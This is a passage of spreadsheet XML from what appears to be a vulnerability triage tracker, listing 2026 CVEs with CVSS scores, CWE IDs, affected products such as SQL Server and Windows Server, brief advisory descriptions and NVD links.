      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86510</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr"/>
      <c r="K291" s="5" t="inlineStr"/>
      <c r="L291" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q291" s="5" t="inlineStr"/>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-787</t>
        </is>
      </c>
      <c r="S291" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86510</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86712</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr"/>
      <c r="K292" s="5" t="inlineStr"/>
      <c r="L292" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q292" s="5" t="inlineStr"/>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S292"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T292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86712</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86722</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr"/>
      <c r="K293" s="5" t="inlineStr"/>
      <c r="L293" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q293" s="5" t="inlineStr"/>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S293"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T293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86722</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58113</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr"/>
      <c r="K294" s="5" t="inlineStr"/>
      <c r="L294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q294" s="5" t="inlineStr"/>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S294"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T294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58113</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67378</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K295" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L295" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q295" s="5" t="inlineStr"/>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S295" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67378</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67379</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K296" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L296" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q296" s="5" t="inlineStr"/>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S296" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67379</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67636</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K297" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L297" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q297" s="5" t="inlineStr"/>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S297" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67636</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74860</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr"/>
      <c r="K298" s="5" t="inlineStr"/>
      <c r="L298" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q298" s="5" t="inlineStr"/>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="S298"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T298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74860</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75993</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr"/>
      <c r="K299" s="5" t="inlineStr"/>
      <c r="L299" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q299" s="5" t="inlineStr"/>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S299"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T299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75993</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76958</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K300" s="5" t="inlineStr"/>
      <c r="L300" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q300" s="5" t="inlineStr"/>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="S300"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T300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76958</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85384</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>f23511db-6c3e-4e32-a477-6aa17d310630</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr"/>
      <c r="K301" s="5" t="inlineStr"/>
      <c r="L301" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q301" s="5" t="inlineStr"/>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S301"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T301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85384</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69479</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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2" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q302" s="5" t="inlineStr"/>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S302" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69479</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69638</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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3" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q303" s="5" t="inlineStr"/>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S303" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69638</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75999</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr"/>
      <c r="K304" s="5" t="inlineStr"/>
      <c r="L304" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q304" s="5" t="inlineStr"/>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S304" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75999</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77827</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr"/>
      <c r="K305" s="5" t="inlineStr"/>
      <c r="L305" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q305" s="5" t="inlineStr"/>
      <c r="R305" s="5" t="inlineStr">
        <is>
          <t>CWE-428</t>
        </is>
      </c>
      <c r="S305" s="5" t="inlineStr">
        <is>
          <t>Maono Link 3.8.13 MaonoAiServices Windows service allows local privilege escalation for a standard user account via improper write privileges in 'C:\ProgramData\Maono'. Fixed in 4.0.80.</t>
        </is>
      </c>
      <c r="T305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77827</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86819</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr"/>
      <c r="K306" s="5" t="inlineStr"/>
      <c r="L306" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q306" s="5" t="inlineStr"/>
      <c r="R306" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S306"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T306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86819</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19203</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr"/>
      <c r="K307" s="5" t="inlineStr"/>
      <c r="L307" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q307" s="5" t="inlineStr"/>
      <c r="R307" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="S307" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19203</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69646</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr"/>
      <c r="K308" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q308" s="5" t="inlineStr"/>
      <c r="R308" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S308" s="5" t="inlineStr">
        <is>
          <t>Improper verification of cryptographic signature in Skype for Business allows an unauthorized attacker to perform spoofing over an adjacent network.</t>
        </is>
      </c>
      <c r="T308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69646</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81821</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
